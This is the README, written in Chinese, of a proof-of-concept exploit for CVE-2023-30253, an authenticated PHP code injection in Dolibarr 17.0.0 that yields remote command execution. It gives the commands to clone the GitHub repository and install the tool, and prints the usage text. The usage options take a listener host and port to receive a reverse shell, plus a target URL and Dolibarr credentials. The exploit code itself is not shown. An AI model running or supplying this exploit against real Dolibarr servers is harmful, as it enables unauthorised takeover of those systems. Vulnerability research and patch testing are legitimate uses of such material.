CVE-2023-30253 PoC
这是我对 CVE-2023-30253(Dolibarr 17.0.0 PHP 代码注入)的 PoC,当 CMS 网站插件(核心)被启用时,经过身份验证的攻击者可以通过绕过应用程序限制的 PHP 代码注入获得远程命令执行。
克隆仓库:
git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git
cd CVE-2023-30253-PoC
pip install -r requirements.txt
python3 exploit.py -h
usage: exploit.py [-h] -lhost LHOST -lport LPORT -rhost RHOST -user USER -pass PASSWORD
Exploit for CVE-2023-30253
options:
-h, --help 显示此帮助信息并退出
-lhost LHOST 本地主机(此主机将接收 shell)
-lport LPORT 本地端口
-rhost RHOST 远程主机 URL,例如:http://site.com/
-user USER Dolibarr 的用户名
-pass PASSWORD Dolibarr 的密码